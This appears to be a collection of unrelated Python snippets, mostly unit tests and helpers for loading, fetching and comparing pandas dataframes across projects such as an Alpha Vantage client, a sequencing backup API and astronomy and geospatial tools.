self.create_data_frame_from_csv_string(input_data)\n\n # ACT\n loader: LoaderCsv = LoaderCsv({'path': TestLoaderCsv.output_file})\n loader.load(TestLoaderCsv.spark, input_df)\n\n # ASSERT\n path = f'file://{TestLoaderCsv.output_file}'\n df_from_loaded_csv: DataFrame = \\\n TestLoaderCsv.spark.read.csv(path, header=True)\n\n assert df_from_loaded_csv.columns == [\n 'facility_name', 'cms_certification_number_ccn', 'alternate_ccn_1', 'address_1',\n 'address_2', 'city', 'state', 'zip_code', 'total_performance_score'\n ]\n self.assert_dataframe_contents(df_from_loaded_csv, [\n ['CHILDRENS HOSPITAL DIALYSIS', '012306', '013300', '1600 7TH AVENUE SOUTH', '-', 'BIRMINGHAM', 'AL', '35233', '99'],\n ['GADSDEN DIALYSIS', '012501', '-', '409 SOUTH FIRST STREET', '-', 'GADSDEN', 'AL', '35901', '100'],\n ['TUSCALOOSA UNIVERSITY DIALYSIS', '012502', '-', '220 15TH STREET', '-', 'TUSCALOOSA', 'AL', '35401', '0'],\n ['DOTHAN DIALYSIS', '012506', '-', '216 GRACELAND DR.', '-', 'DOTHAN', 'AL', '36305', '88'],\n ])", "def test_fetch_traces(self):\n try:\n self.tsp_client.fetch_traces()\n except Exception as e:\n pytest.exit(str(e))\n # Deleting left-over data here doesn't work consistently, but remains handy if tests fail.\n self._delete_experiments()\n self._delete_traces()", "def test_header(self):\n frame_with_header = self.context.frame.import_csv(\n self.dataset, schema=self.schema, header=True)\n frame_without_header = self.context.frame.import_csv(self.dataset,\n schema=self.schema, header=False)\n\n # the frame with the header should have one less row\n # because it should have skipped the first line\n self.assertEqual(len(frame_with_header.take(frame_with_header.count()).data),\n len(frame_without_header.take(frame_without_header.count()).data) - 1)\n # comparing the content of the frame with header and without\n # they should have the same rows with the only differnce being the\n # frame with the header should not have the first row\n for index in xrange(0, frame_with_header.count()):\n self.assertEqual(str(frame_with_header.take(frame_with_header.count()).data[index]),\n str(frame_without_header.take(frame_without_header.count()).data[index + 1]))", "def test_import(import_data):\n try:\n df_tab = import_data()\n logging.info(\"Testing import_data: Successfully Found File\")\n except FileNotFoundError as err:\n logging.error(\"Testing import_data: The file wasn't found\")\n raise err\n\n try:\n assert df_tab.shape[0] > 0\n assert df_tab.shape[1] > 0\n logging.info(\"Testing import_data: Successfully Available Data\")\n except AssertionError as err:\n logging.error(\n \"Testing import_data: The file doesn't appear to have rows and columns\"\n )\n raise err\n\n return df_tab", "def test_fetchlocation(self):\n result = export.processExport(houseId=1,\n locationIds = [1,],\n )\n\n self.assertEqual(result.shape, (2880, 1))\n self.assertEqual(result.columns[0], LOC1)\n\n result = export.processExport(houseId=1,\n locationIds = [2,],\n )\n\n self.assertEqual(result.shape, (2880, 1))\n self.assertEqual(result.columns[0], LOC2)", "def retrieve(osm_path,geoType,keyCol,**valConstraint):\n driver=ogr.GetDriverByName('OSM')\n data = driver.Open(osm_path)\n query = query_b(geoType,keyCol,**valConstraint)\n sql_lyr = data.ExecuteSQL(query)\n features =[]\n # cl = columns \n cl = ['osm_id'] \n for a in keyCol: cl.append(a)\n if data is not None:\n print('query is finished, lets start the loop')\n for feature in tqdm(sql_lyr):\n try:\n if feature.GetField(keyCol[0]) is not None:\n geom = from_wkb(feature.geometry().ExportToWkb()) \n if geom is None:\n continue\n # field will become a row in the dataframe.\n field = []\n for i in cl: field.append(feature.GetField(i))\n field.append(geom) \n features.append(field)\n except:\n print(\"WARNING: skipped OSM feature\") \n else:\n print(\"ERROR: Nonetype error when requesting SQL. Check required.\") \n cl.append('geometry') \n if len(features) > 0:\n return pandas.DataFrame(features,columns=cl)\n else:\n print(\"WARNING: No features or No Memory. returning empty GeoDataFrame\") \n return pandas.DataFrame(columns=['osm_id','geometry'])", "def test_unpack_dataframe(self, batched_df, expected):\n unpacked_list = _BatchingManager.split_dataframe(batched_df, 1)\n assert len(unpacked_list) == 1\n # On windows, conversion dtype is not preserved.\n check_dtype = not os.name == \"nt\"\n pd.testing.assert_frame_equal(\n unpacked_list[0].reset_index(drop=True),\n expected.reset_index(drop=True),\n check_dtype=check_dtype,\n )", "def find_all_ORFs_oneframe_unit_tests():\n data_list = [\n [\"ATGCATGAATGTAGATAGATGTGCCC\", [\"ATGCATGAATGTAGA\", \"ATGTGCCC\"]],\n [\"ATGTAGATGTAG\", [\"ATG\", \"ATG\"]],\n [\"ATGATGATG\", [\"ATGATGATG\"]],\n [\"ATGGGGGATTAGATGATG\", [\"ATGGGGGAT\", \"ATGATG\"]],\n [\"ATGTGAATGTAA\", [\"ATG\", \"ATG\"]],\n [\"ATGTGAATGTAAATG\", [\"ATG\", \"ATG\", \"ATG\"]],\n [\"ATGCGTGGTGATTAGATGGATGGGGATTGA\", [\"ATGCGTGGTGAT\", \"ATGGATGGGGAT\"]],\n [\"ATGAAATTTCCCGGGAAATTTCCCGGG\", [\"ATGAAATTTCCCGGGAAATTTCCCGGG\"]],\n [\"ATGAAATTTTGAATGGGGCCC\", [\"ATGAAATTT\", \"ATGGGGCCC\"]],\n [\"ATGAAATTTTGAATGGGGCCCTAG\", [\"ATGAAATTT\", \"ATGGGGCCC\"]],\n ]\n for data in data_list:\n if len(data) == 2:\n print \"input: \" + str(data[0]) + \",\",\n print \"expected output: \" + str(data[1]) + \",\",\n o = find_all_ORFs_oneframe(data[0])\n print \"actual output: \" + str(o)\n if o != data[1]:\n print \"## Test Fail Here!\"", "def test_fetch_flow_cell_retrieve_specified_flow_cell(\n mock_store,\n mock_flow_cell,\n mock_tar,\n mock_get_first_flow_cell,\n mock_check_processing,\n mock_get_archived_key,\n mock_get_archived_flow_cell,\n archived_key,\n archived_flow_cell,\n cg_context,\n caplog,\n):\n\n caplog.set_level(logging.INFO)\n\n # GIVEN we want to retrieve a specific flow cell from PDC\n backup_api = BackupAPI(\n encryption_api=mock.Mock(),\n encrypt_dir=cg_context.backup.encrypt_dir.dict(),\n status=mock_store,\n tar_api=mock_tar,\n pdc_api=mock.Mock(),\n flow_cells_dir=\"cg_context.flow_cells_dir\",\n )\n mock_flow_cell.status = FlowCellStatus.REQUESTED\n mock_flow_cell.sequencer_type = Sequencers.NOVASEQ\n backup_api.check_processing.return_value = True\n backup_api.get_archived_encryption_key_path.return_value = archived_key\n backup_api.get_archived_flow_cell_path.return_value = archived_flow_cell\n backup_api.tar_api.run_tar_command.return_value = None\n result = backup_api.fetch_flow_cell(flow_cell=mock_flow_cell)\n\n # THEN no flow cell is taken form statusdb\n mock_get_first_flow_cell.assert_not_called()\n\n # THEN the process to retrieve the flow cell from PDC is started\n assert \"retrieving from PDC\" in caplog.text\n\n # AND when done the status of that flow cell is set to \"retrieved\"\n assert (\n f\"Status for flow cell {mock_flow_cell.name} set to {FlowCellStatus.RETRIEVED}\"\n in caplog.text\n )\n assert mock_flow_cell.status == \"retrieved\"\n\n # AND status-db is updated with the new status\n assert mock_store.session.commit.called\n\n # AND the elapsed time of the retrieval process is returned\n assert result > 0", "def test_technical_indicator_sma_pandas_python2(self, mock_urlopen):\n ti = TechIndicators(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=SMA&symbol=MSFT&interval=15min&time_period=10&series_type=close&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = ti.get_sma(\"MSFT\", interval='15min',\n time_period=10, series_type='close')\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_from_spotdb(spotdb_data):\n\n db = spotdb_data\n runs = db.get_all_run_ids()\n gfs = GraphFrame.from_spotdb(spotdb_data, runs[0:2])\n\n assert len(gfs) == 2\n\n metrics = {\"Total time (inc)\", \"Avg time/rank (inc)\"}\n\n assert len(gfs[0].dataframe) > 2\n assert gfs[0].default_metric == \"Total time (inc)\"\n assert metrics < set(gfs[0].dataframe.columns)\n\n assert \"launchdate\" in gfs[0].metadata.keys()", "def test_read_xls(self):\r\n my_tape = Tape()\r\n input_xls = os.path.join(test_files_dir, 'test_tape.xlsx')\r\n my_tape.read_xls(input_xls)\r\n assert_frame_equal(self.test_df, my_tape.dataframe)", "def getDataFrames(sampleparams, shakeparams, predictors, outparams):\n coverage = sampleparams['coverage']\n f = fiona.collection(coverage, 'r')\n cbounds = f.bounds\n f.close()\n dx = sampleparams['dx']\n cb = sampleparams['cb']\n nmax = sampleparams['nmax']\n nsamp = sampleparams['nsamp']\n touch_center = sampleparams['touch_center']\n testpercent = sampleparams['testpercent']\n extent = sampleparams['extent']\n h1 = sampleparams['h1']\n h2 = sampleparams['h2']\n\n yestest, yestrain, notest, notrain, xvar, yvar, pshapes, proj = sampleFromFile(coverage, dx=dx,\n nmax=nmax, testPercent=testpercent, touch_center=touch_center, classBalance=cb, extent=extent,\n Nsamp=nsamp, h1=h1, h2=h2)\n\n traincolumns = OrderedDict()\n testcolumns = OrderedDict()\n\n if (100-testpercent) > 0:\n traincolumns['lat'] = np.concatenate((yestrain[:, 1], notrain[:, 1]))\n traincolumns['lon'] = np.concatenate((yestrain[:, 0], notrain[:, 0]))\n traincolumns['coverage'] = np.concatenate((np.ones_like(yestrain[:, 1]),\n np.zeros_like(notrain[:, 1])))\n\n if testpercent > 0:\n testcolumns['lat'] = np.concatenate((yestest[:, 1], notest[:, 1]))\n testcolumns['lon'] = np.concatenate((yestest[:, 0], notest[:, 0]))\n testcolumns['coverage'] = np.concatenate((np.ones_like(yestest[:, 1]), np.zeros_like(notest[:, 1])))\n\n for predname, predfile in predictors.items():\n ftype = getFileType(predfile)\n if ftype == 'shapefile':\n attribute = predictors[predname+'_attribute']\n shapes = subsetShapes(predfile, cbounds)\n yes_test_samples = sampleShapes(shapes, yestest, attribute)\n no_test_samples = sampleShapes(shapes, notest, attribute)\n yes_train_samples = sampleShapes(shapes, yestrain, attribute)\n no_train_samples = sampleShapes(shapes, notrain, attribute)\n testcolumns[predname] = np.squeeze(np.concatenate((yes_test_samples, no_test_samples)))\n traincolumns[predname] = np.squeeze(np.concatenate((yes_train_samples, no_train_samples)))\n elif ftype == 'grid':\n method = 'nearest'\n if predname+'_sampling' in predictors:\n method = predictors[predname+'_sampling']\n\n if testpercent > 0:\n yes_test_samples = sampleGridFile(predfile, yestest, method=method)\n no_test_samples = sampleGridFile(predfile, notest, method=method)\n testcolumns[predname] = np.squeeze(np.concatenate((yes_test_samples, no_test_samples)))\n\n if (100-testpercent) > 0:\n yes_train_samples = sampleGridFile(predfile, yestrain, method=method)\n no_train_samples = sampleGridFile(predfile, notrain, method=method)\n traincolumns[predname] = np.squeeze(np.concatenate((yes_train_samples, no_train_samples)))\n else:\n continue # attribute or sampling method key\n\n #sample the shakemap\n layers = ['mmi', 'pga', 'pgv', 'psa03', 'psa10', 'psa30']\n shakegrid = ShakeGrid.load(shakeparams['shakemap'], adjust='res')\n for layer in layers:\n yes_test_samples = sampleFromMultiGrid(shakegrid, layer, yestest)\n no_test_samples = sampleFromMultiGrid(shakegrid, layer, notest)\n yes_train_samples = sampleFromMultiGrid(shakegrid, layer, yestrain)\n no_train_samples = sampleFromMultiGrid(shakegrid, layer, notrain)\n if testpercent > 0:\n testcolumns[layer] = np.squeeze(np.concatenate((yes_test_samples, no_test_samples)))\n if (100-testpercent) > 0:\n traincolumns[layer] = np.squeeze(np.concatenate((yes_train_samples, no_train_samples)))\n\n dftest = pd.DataFrame(testcolumns)\n dftrain = pd.DataFrame(traincolumns)\n\n return (dftrain, dftest)", "def test_load_dataset():\n\n # Given\n dataset_file_name = core.config.app_config.TESTING_DATA_FILE\n\n # When\n subject = utils.load_dataset(filename=dataset_file_name)\n\n # Then\n assert isinstance(subject, pd.DataFrame)\n assert subject.shape == (5940, 41)", "async def test_fetch_dataset_metadata_call(self):\n pool = asynctest.CoroutineMock()\n pool.acquire().__aenter__.return_value = Connection()\n result = await fetch_dataset_metadata(pool, None, None)\n # for now it can return empty dataset\n # in order to get a response we will have to mock it\n # in Connection() class\n self.assertEqual(result, [])", "def test_open_close():\n spds = SDPS(VirtualDevice(), 'MX28')\n assert not spds.is_opened\n spds.open()\n assert spds.is_opened\n spds.open()\n #TODO: analyze caplog, there should be no new records\n assert spds.is_opened", "def test_fileobj_not_closed(self):\n\n f = open(self.data(\"test0.fits\"), \"rb\")\n _ = fits.getdata(f)\n assert not f.closed\n\n f.seek(0)\n _ = fits.getheader(f)\n assert not f.closed\n\n f.close() # Close it now", "def testIrradianceFetch(self):\n\n timeCol = 'timestamp'\n rows = []\n for row in self.aggregator.rawData(dataType = 'irradiance',\n orderBy = [timeCol, 'sensor_id'],\n timestampCol = timeCol,\n startDate = self.testStart,\n endDate = self.testEnd):\n rows.append(row)\n self.assertIsNotNone(rows, 'Rows are present.')", "def fetch():\n return True", "def test_fetch_flow_cell_integration(\n mock_store,\n mock_flow_cell,\n mock_tar,\n mock_query,\n archived_key,\n archived_flow_cell,\n cg_context,\n pdc_query,\n caplog,\n):\n\n caplog.set_level(logging.INFO)\n\n # GIVEN we want to retrieve a specific flow cell from PDC\n backup_api = BackupAPI(\n encryption_api=mock.Mock(),\n encrypt_dir=cg_context.backup.encrypt_dir.dict(),\n status=mock_store,\n tar_api=mock_tar,\n pdc_api=mock.Mock(),\n flow_cells_dir=cg_context.flow_cells_dir,\n )\n mock_flow_cell.status = FlowCellStatus.REQUESTED\n mock_flow_cell.sequencer_type = Sequencers.NOVASEQ\n mock_store.get_flow_cells_by_statuses.return_value.count.return_value = 0\n mock_query.return_value = pdc_query\n\n backup_api.tar_api.run_tar_command.return_value = None\n result = backup_api.fetch_flow_cell(flow_cell=mock_flow_cell)\n\n # THEN the process to retrieve the flow cell from PDC is started\n assert \"retrieving from PDC\" in caplog.text\n\n # AND when done the status of that flow cell is set to \"retrieved\"\n assert (\n f\"Status for flow cell {mock_flow_cell.name} set to {FlowCellStatus.RETRIEVED}\"\n in caplog.text\n )\n assert mock_flow_cell.status == \"retrieved\"\n\n # AND status-db is updated with the new status\n assert mock_store.session.commit.called\n\n # AND the elapsed time of the retrieval process is returned\n assert result > 0", "def test_crypto_currencies_pandas_python3(self, mock_urlopen):\n cc = CryptoCurrencies(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=DIGITAL_CURRENCY_INTRADAY&symbol=BTC&market=CNY&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = cc.get_digital_currency_intraday(\n symbol='BTC', market='CNY')\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_view(self):\n symbol = 'NFLX'\n table = 'option'\n path = os.path.join(CLEAN_DIR, '__%s__.h5' % symbol.lower())\n db = pd.HDFStore(path)\n df_valid = db.select('%s/valid/normal' % table)\n df_clean = db.select('%s/clean/normal' % table)\n db.close()\n\n df_date = df_valid[df_valid['date'] == '2015-08-27']\n df_date = df_date[df_date['name'] == 'CALL'].sort_values('ex_date')\n print df_date.to_string(line_width=1000)\n\n df_date = df_clean[df_clean['date'] == '2015-08-27']\n df_date = df_date[df_date['name'] == 'CALL'].sort_values('ex_date')\n print df_date.to_string(line_width=1000)\n\n # self.client.get(reverse('admin:calc_day_iv', kwargs={'symbol': 'GG', 'insert': 0}))", "def test_fetch_flow_cell_no_flow_cells_requested(\n mock_store,\n mock_check_processing,\n mock_get_first_flow_cell,\n caplog,\n):\n\n caplog.set_level(logging.INFO)\n\n # GIVEN we check if a flow cell needs to be retrieved from PDC\n backup_api = BackupAPI(\n encryption_api=mock.Mock(),\n encrypt_dir=mock.Mock(),\n status=mock_store,\n tar_api=mock.Mock(),\n pdc_api=mock.Mock(),\n flow_cells_dir=mock.Mock(),\n )\n\n # WHEN no flow cells are requested\n backup_api.get_first_flow_cell.return_value = None\n backup_api.check_processing.return_value = True\n\n # AND no flow cell has been specified\n mock_flow_cell = None\n\n result = backup_api.fetch_flow_cell(mock_flow_cell)\n\n # THEN no flow cell will be fetched and a log message indicates that no flow cells have been\n # requested\n assert result is None\n assert \"No flow cells requested\" in caplog.text", "def test_from_object_class(self):\n df_test = make_simple_dataframe()\n Base_object = BaseDataClass.from_object(df_test)\n df_read = BaseDataClass.from_object(Base_object).df\n self.assertEqual(\n pd.testing.assert_frame_equal(df_test, df_read),\n None,\n )", "def test_number_of_rows_without_header(self):\n url=\"http://archive.ics.uci.edu/ml/machine-learning-databases/car/car.data\"\n\n reader=requester.url_to_df(url)\n rows,columns=reader.shape\n self.assertEqual(rows,1728)", "def test_read_data():\r\n test_data_r = pd.read_csv('Test_files/test_data.csv')\r\n test_data_c = pd.DataFrame({'id':[1,2,3,4],\r\n 'price':[8000,950,2400,1150],\r\n 'currency':['PLN','GBP','PLN','EU'],\r\n 'quantity':[6,1,1,2],\r\n 'matching_id':[1,3,2,2,]})\r\n\r\n assert_frame_equal(test_data_r, test_data_c)\r\n\r\n test_matching_r= pd.read_csv('Test_files/test_matching.csv')\r\n test_matching_c = pd.DataFrame({'matching_id':[1,2,3],\r\n 'top_priced_count':[1,2,1]})\r\n\r\n assert_frame_equal(test_matching_r,test_matching_c)\r\n\r\n test_currencies_r = pd.read_csv('Test_files/test_currencies.csv')\r\n test_currencies_c = pd.DataFrame({'currency':['GBP','EU','PLN'],\r\n 'ratio':[2.6,2.2,1]})\r\n\r\n assert_frame_equal(test_currencies_r,test_currencies_c)\r\n\r\n return test_data_r,test_matching_r,test_currencies_r", "def test_prepare_essentiality_data(ijr904, combined_dataframe):\n tested_dataframe = essential.prepare_essentiality_data(\n join(dirname(__file__), \"data\", \"essentiality\", \"mock_essential.csv\"), ijr904\n )\n assert tested_dataframe.equals(combined_dataframe)", "def test_sector_perfomance_python3(self, mock_urlopen):\n sp = SectorPerformances(key=TestAlphaVantage._API_KEY_TEST)\n url = \"https://www.alphavantage.co/query?function=SECTOR&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = sp.get_sector()\n self.assertIsInstance(\n data, dict, 'Result Data must be a dictionary')", "def test_derive_lookback_window_from_window_and_interval_params(self, mock_get_prices):\n class BuyBelow10(Moonshot):\n \"\"\"\n A basic test strategy that buys below 10.\n \"\"\"\n DB = 'test-db'\n SOME_WINDOW = 100\n SOME_OTHER_WINDOW = 5\n SOME_NONINT_WINDOW = \"foo\" # make sure ignored\n REBALANCE_INTERVAL = \"Q\"\n OTHER_INTERVAL = \"MS\"\n INVALID_INTERNVAL = \"invalid\" # make sure ignored\n\n def prices_to_signals(self, prices):\n signals = prices.loc[\"Close\"] < 10\n return signals.astype(int)\n\n def _mock_get_prices():\n\n dt_idx = pd.DatetimeIndex([\"2018-05-01\",\"2018-05-02\",\"2018-05-03\", \"2018-05-04\"])\n fields = [\"Close\",\"Volume\"]\n idx = pd.MultiIndex.from_product([fields, dt_idx], names=[\"Field\", \"Date\"])\n\n prices = pd.DataFrame(\n {\n \"FI12345\": [\n #Close\n 9,\n 11,\n 10.50,\n 9.99,\n # Volume\n 5000,\n 16000,\n 8800,\n 9900\n ],\n \"FI23456\": [\n # Close\n 9.89,\n 11,\n 8.50,\n 10.50,\n # Volume\n 15000,\n 14000,\n 28800,\n 17000\n\n ],\n },\n index=idx\n )\n\n return prices\n\n def mock_download_master_file(f, *args, **kwargs):\n\n master_fields = [\"Timezone\", \"Symbol\", \"SecType\", \"Currency\", \"PriceMagnifier\", \"Multiplier\"]\n securities = pd.DataFrame(\n {\n \"FI12345\": [\n \"America/New_York\",\n \"ABC\",\n \"STK\",\n \"USD\",\n None,\n None\n ],\n \"FI23456\": [\n \"America/New_York\",\n \"DEF\",\n \"STK\",\n \"USD\",\n None,\n None,\n ]\n },\n index=master_fields\n )\n securities.columns.name = \"Sid\"\n securities.T.to_csv(f, index=True, header=True)\n f.seek(0)\n\n mock_get_prices.return_value = _mock_get_prices()\n\n with patch(\"moonshot.strategies.base.download_master_file\", new=mock_download_master_file):\n results = BuyBelow10().backtest(start_date=\"2018-05-01\", end_date=\"2018-05-04\")\n\n get_prices_call = mock_get_prices.mock_calls[0]\n _, args, kwargs = get_prices_call\n self.assertListEqual(kwargs[\"codes\"], [\"test-db\"])\n self.assertIn(kwargs[\"start_date\"], (\"2017-08-04\", \"2017-08-05\", \"2017-08-06\", \"2017-08-07\")) # 100 + 60ish trading days before requested start_date\n self.assertEqual(kwargs[\"end_date\"], \"2018-05-04\")\n self.assertEqual(kwargs[\"fields\"], ['Open', 'Close', 'Volume'])\n self.assertIsNone(kwargs[\"timezone\"])\n self.assertTrue(kwargs[\"infer_timezone\"])", "def test_fileobj_not_closed(self):\n\n f = open(self.data('test0.fits'), 'rb')\n data = fits.getdata(f)\n assert not f.closed\n\n f.seek(0)\n header = fits.getheader(f)\n assert not f.closed", "def test_download_dataset_partial(tmp_path, monkeypatch):\n\n remote_dataset = Dataset()\n remote_dataset.x = 1\n remote_dataset.y = 2\n\n monkeypatch.setattr(\n pennylane.data.data_manager, \"open_hdf5_s3\", MagicMock(return_value=remote_dataset.bind)\n )\n\n pennylane.data.data_manager._download_dataset(\n \"dataset/path\", tmp_path / \"dataset\", attributes=[\"x\"]\n )\n\n local = Dataset.open(tmp_path / \"dataset\")\n\n assert local.x == 1\n assert not hasattr(local, \"y\")", "def test_fetch_working(suvi_client):\n start = '2019/05/25 00:50'\n end = '2019/05/25 00:52'\n wave = 94 * u.Angstrom\n goes_sat = a.goes.SatelliteNumber.sixteen\n tr = a.Time(start, end)\n qr1 = suvi_client.search(tr, a.Instrument.suvi, a.Wavelength(wave), goes_sat, a.Level(2))\n\n # Mock QueryResponse object\n mock_qr = mock_query_object(suvi_client)\n\n # Compare if two objects have the same attribute\n\n mock_qr = mock_qr[0]\n qr = qr1[0]\n\n assert mock_qr['Source'] == qr['Source']\n assert mock_qr['Provider'] == qr['Provider']\n assert mock_qr['Physobs'] == qr['Physobs']\n assert mock_qr['Instrument'] == qr['Instrument']\n assert mock_qr['url'] == qr['url']\n\n assert qr1['Start Time'] == Time(\"2019-05-25T00:52:00.000\")\n assert qr1['End Time'] == Time(\"2019-05-25T00:56:00.000\")\n\n with tempfile.TemporaryDirectory() as tmpdirname:\n download_list = suvi_client.fetch(qr1, path=tmpdirname)\n assert len(download_list) == len(qr1)", "def test_recv(self):\n # Required to get useful test names\n super(TestCisPandasInput_local, self).test_recv()", "def test_time_series_intraday_pandas_python2(self, mock_urlopen):\n ts = TimeSeries(key=TestAlphaVantage._API_KEY_TEST,\n output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=MSFT&interval=1min&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = ts.get_intraday(\n \"MSFT\", interval='1min', outputsize='full')\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_unpacking(n_depthPCs=20, namespace=\"hg38_noEBV\"):\n def unpack_df(bm_small, db, **kwargs):\n cols = list(bm_small.index) + list(bm_small[\"Best Match\"])\n df = db.query(cols)\n packed_df = mutil.PackedFrame(df, **kwargs)\n df = packed_df.unpack()\n bm_final = packed_df.update_colmaps(bm_small, **kwargs)\n return df, bm_final\n from datastack.dbs.rdb import RosettaDBMongo\n db = RosettaDBMongo(host=\"rosetta.hli.io\")\n db.initialize(namespace=namespace)\n\n best_matches = pd.read_table(\"../data_local/visit1_to_visit2_colnames.txt\", sep=\"\\t\", index_col=0)\n \n bm_small = best_matches[(best_matches[\"Group\"] == \"face.v6\") & (~best_matches[\"Best Match\"].str.contains(\"mirror\"))]\n df_v1_v2, bm_final_v1_v2 = unpack_df(bm_small, db,\n from_str=\"visit1\", to_str=\"visit2\", \n maxElements={\"ColorPC\": n_depthPCs, \"DepthPC\": n_depthPCs})\n \n assert pd.Series(bm_final_v1_v2.index).str.contains(\"visit1\").all(), \"From column is wrong format\"\n assert bm_final_v1_v2[\"Best Match\"].str.contains(\"visit2\").all(), \"To column is wrong format\"\n assert (bm_final_v1_v2[\"Score\"] < 100).sum() == 0, \"Did not retrieve exact matches\"\n assert bm_final_v1_v2.shape[0] == 2 * n_depthPCs, \"Got the wrong number of mappings. Expected %s, got %s\" % (2 * n_depthPCs, bm_final_v1_v2.shape[0])\n print \"Passed test 1\"\n # Observed/predicted test\n best_matches = pd.read_table(\"../data_local/pred_to_obs_colnames.txt\", sep=\"\\t\", index_col=0)\n bm_small = best_matches.filter(like=\"Depth\", axis=0)\n\n df_obs_pred, bm_final = unpack_df(bm_small, db, from_str=\".FACE_P.\", to_str=\".FACE.\", \n maxElements={\"DepthPC\": n_depthPCs})\n assert pd.Series(bm_final.index).str.contains(\".FACE_P.\").all(), \"From column is wrong format\"\n assert bm_final[\"Best Match\"].str.contains(\".FACE.\").all(), \"To column is wrong format\"\n assert (bm_final[\"Score\"] < 100).sum() == 0, \"Did not retrieve exact matches\"\n assert bm_final.shape[0] == n_depthPCs, \"Got the wrong number of mappings. Expected %s, got %s\" % (n_depthPCs, bm_final.shape[0])\n print \"Passed test 2\"\n print \"Passed all unpacking tests\"", "def getDataframe(self, year = 2014):\r\n \r\n # Retrieve Stat Dataframes\r\n salary_df = self.getSalaryStat(year)\r\n touch_df = self.getPlayerAdvStat('touch', year)\r\n speed_df = self.getPlayerAdvStat('speed', year)\r\n base_df = self.getPlayerBaseStat(year)\r\n team_df = self.getTeamStat(year)\r\n \r\n # Set of Merge Variables to prevent overlap\r\n to_merge_1 = ['PLAYER_NAME', 'AVG_SPEED', 'AVG_SPEED_DEF', 'AVG_SPEED_OFF', \r\n 'DIST_FEET', 'DIST_MILES', 'DIST_MILES_DEF', 'DIST_MILES_OFF',\r\n 'MIN1']\r\n to_merge_2 = ['PLAYER_NAME', 'AGE', 'AST', 'BLK', 'BLKA', 'CFID', 'CFPARAMS', 'DD2',\r\n 'DREB', 'FG3A', 'FG3M', 'FG3_PCT', 'FGA', 'FGM', 'FG_PCT', 'FTA', \r\n 'FTM', 'FT_PCT', 'OREB', 'PF', 'PFD', 'PLUS_MINUS', 'PTS', 'REB', \r\n 'STL', 'TD3', 'TOV', 'W_PCT'] \r\n \r\n player_df = pd.merge(salary_df, \r\n pd.merge(\r\n pd.merge(touch_df, speed_df[to_merge_1], on = 'PLAYER_NAME',how = 'outer'),\r\n base_df[to_merge_2], on = 'PLAYER_NAME', how = 'outer'),\r\n on = 'PLAYER_NAME', how = 'outer')\r\n \r\n all_df = pd.merge(team_df, player_df, on = 'TEAM_ID', suffixes= ['_t', '_p'], how = 'right')\r\n \r\n return all_df", "def test_empty_last_data_frame(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"123\"\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n deproxy_cl.make_request(request=request_body, end_stream=False)\n deproxy_cl.make_request(request=\"\", end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "def test_get_work_from_edition_data(self):\n data = {\"works\": [{\"key\": \"/work/OL1234W\"}]}\n responses.add(\n responses.GET,\n \"https://openlibrary.org/work/OL1234W\",\n json={\"hi\": \"there\"},\n status=200,\n )\n result = self.connector.get_work_from_edition_data(data)\n self.assertEqual(result, {\"hi\": \"there\"})", "def test_technical_indicator_sma_pandas_python3(self, mock_urlopen):\n ti = TechIndicators(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=SMA&symbol=MSFT&interval=15min&time_period=10&series_type=close&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = ti.get_sma(\"MSFT\", interval='15min',\n time_period=10, series_type='close')\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_rst_frame_in_request(self):\n client = self.get_client(\"deproxy\")\n\n self.start_all_services()\n self.initiate_h2_connection(client)\n\n # client opens streams with id 1, 3 and does not close them\n client.make_request(request=self.post_request, end_stream=False)\n client.stream_id = 3\n client.make_request(request=self.post_request, end_stream=False)\n\n # client send RST_STREAM frame with NO_ERROR code in stream 1 and\n # Tempesta closes it for itself.\n client.h2_connection.reset_stream(stream_id=1, error_code=0)\n client.send_bytes(client.h2_connection.data_to_send())\n\n # Client send DATA frame in stream 3 and it MUST receive response\n client.send_request(\"qwe\", \"200\")\n\n # Tempesta allows creating new streams.\n client.stream_id = 5\n client.send_request(self.post_request, \"200\")\n\n self.assertFalse(\n client.connection_is_closed(), \"Tempesta closed connection after receiving RST_STREAM.\"\n )", "def fetch_data(self) -> pd.DataFrame:\r\n os.chdir(r'\\\\192.168.8.90\\投研部\\Jessica\\test_data')\r\n if self.tic in ['RB.CCRI', 'HC.CCRI', 'I.CCRI', 'J.CCRI', 'JM.CCRI', 'ZC.CCRI']:\r\n f = pd.read_hdf('data.h5', 'snc')\r\n if self.tic in ['CU.CCRI', 'ZN.CCRI', 'AL.CCRI', 'NI.CCRI']:\r\n f = pd.read_hdf('data.h5', 'met')\r\n data = f.loc[f.loc[:, 'sec_code'] == self.tic, :]\r\n # extract I.CCRI data\r\n table = pd.pivot_table(data, index=['date'], columns=['factor_code'], values='factor_value')\r\n table = table.sort_values(by='date')\r\n \r\n return table", "def test_load_simulated(dl1_file):\n from ctapipe.io.tableloader import TableLoader\n\n with TableLoader(dl1_file, load_simulated=True) as table_loader:\n table = table_loader.read_subarray_events()\n assert \"true_energy\" in table.colnames\n assert table[\"obs_id\"].dtype == np.int32\n\n table = table_loader.read_telescope_events([8])\n assert \"true_energy\" in table.colnames\n assert \"true_impact_distance\" in table.colnames", "def test_batch_quotes_pandas_python2(self, mock_urlopen):\n ts = 